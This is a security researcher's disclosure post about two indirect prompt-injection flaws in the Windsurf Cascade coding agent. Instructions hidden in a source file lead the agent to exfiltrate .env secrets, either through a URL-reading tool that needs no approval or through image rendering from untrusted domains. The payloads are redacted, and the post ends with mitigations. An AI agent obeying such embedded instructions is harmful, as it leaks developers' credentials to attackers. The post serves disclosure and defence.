Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets
This is the first post in a series exploring security vulnerabilities in Windsurf. If you are unfamiliar with Windsurf, it is a fork of VS Code and the coding agent is called Windsurf Cascade.
The attack vectors we will explore today allow an adversary during an indirect prompt injection to exfiltrate data from the developer’s machine.
These vulnerabilities are a great example of Simon Willison’s lethal trifecta pattern.
Overall, the security vulnerability reporting experience with Windsurf has not been great. All findings were responsibly disclosed on May 30, 2025, and receipt was acknowledged a few days later. However, all further inquiries regarding bug status or fixes remain unanswered. The recent business disruptions and departure of CEO and core team members certainly put Windsurf in the news.
Since Windsurf has been unresponsive and these high-severity vulnerabilities allow the exfiltration of sensitive information from developers, this post will not disclose all technical details and prompt injection payloads. Hopefully, Windsurf will eventually address these deficiencies.
Let’s explore this in detail.
Windsurf System Prompt
When looking at a new system, I always take a peek at the system prompt first. I’m looking for tools that might be able to be invoked during a prompt injection attack. Sometimes there are also other interesting tidbits present.
Here is a snippet of the system prompt:
You can find the Windsurf Cascade system prompt here.
One thing that stood out to me right away was the read_url_content
tool.
Attack Vector 1: Tools as Data Exfiltration Vectors
As the name read_url_content
suggests, this tool allows Windsurf to connect to a website and read data from it. However, a reading capability can also serve as a data exfiltration channel as part of the outbound HTTP request. And this tool does not require user approval, so it can be successfully invoked by an adversary during a prompt injection attack.
As a result, an attacker can exploit this during an indirect prompt injection attack - without requiring user confirmation.
Exploit Demonstration
The prompt injection exploit for this demo is stored in a source code file. This represents one plausible attack vector, but certainly not the only one!
Now, when the developer analyzes the file with Windsurf Cascade it will attack and exploit the AI agent and exfiltrate the contents of the .env
file using the read_url_content
tool.
The above screenshot shows how by simply analyzing a file with Windsurf, the text within it can hijack Windsurf Cascade to exfiltrate sensitive information from the developer’s workstation.
Video Demonstration Proof-of-Concept
This video shows how such an exploit chain looks end-to-end:
Prompt Injection Payload
This is the text in the beginning of the source code file:
<redacted for now, as this is not fixed>
With this simple proof-of-concept payload, the AI agent is hijacked to exfiltrate sensitive environment variables and other information as it analyzes the file, all without requiring user approval
Attack Vector 2: Image Rendering
The second attack vector is quite similar to a vulnerability I found in GitHub Copilot last year, which Microsoft has since fixed. You can read up details here.
Image rendering from untrusted domains is actually one of the most common AI application security vulnerabilities to be aware of. We have seen dozens of examples of this vulnerability over the last two+ years.
Exploit Demonstration
As we have shown with many similar attacks over the last 2+ years this does not require a human in the loop and leads to data leakage when an application renders images from untrusted domains.
To keep things short in this post, the following screenshot shows the end to end exploit chain in a single screenshot:
This shows how Windsurf is hijacked and exfiltrates sensitive information from the developer’s workstation to a third-party server.
Video Demonstration Proof-of-Concept
Prompt Injection Payload
This is the text in the beginning of the source code file:
<redacted for now, as this is not fixed>
That’s all that was needed to hijack Windsurf Cascade.
Responsible Disclosure
These vulnerabilities were disclosed to Windsurf on May 30, 2025, and receipt acknowledged by Windsurf a few days later. However, all further inquiries around triage, bug status or fixes remain unanswered.
Hence, disclosing this publicly after three months seems the best approach to raise awareness and educate customers and users about these high-severity vulnerabilities.
Mitigations
- Require a human-in-the-loop before invoking the
read_url_content
tool with untrusted servers - Consider an allow-list of trusted domains that can be read from securely without user approval
- Do not render images/hyperlinks to untrusted domains. VS Code has an allow list of trusted domains, so it might be best to integrate with that feature
- Also, do not automatically navigate to clickable hyperlinks (e.g. phishing attacks)
- If you are a customer of Windsurf, I suggest reaching out to your account manager to inquire about these high-severity vulnerabilites to raise awareness and get them fixed
Conclusion
Windsurf Cascade is vulnerable to prompt injection and since there is no deterministic solution to fix prompt injection itself, security has to be enforced downstream of LLM output.
As demonstrated, weaknesses in tool invocation and image rendering allow a third-party attacker to embed malicious instructions into source code, websites, or even through RAG poisoning. When Cascade analyzes such content, it becomes a “confused deputy”, potentially leading to data exfiltration.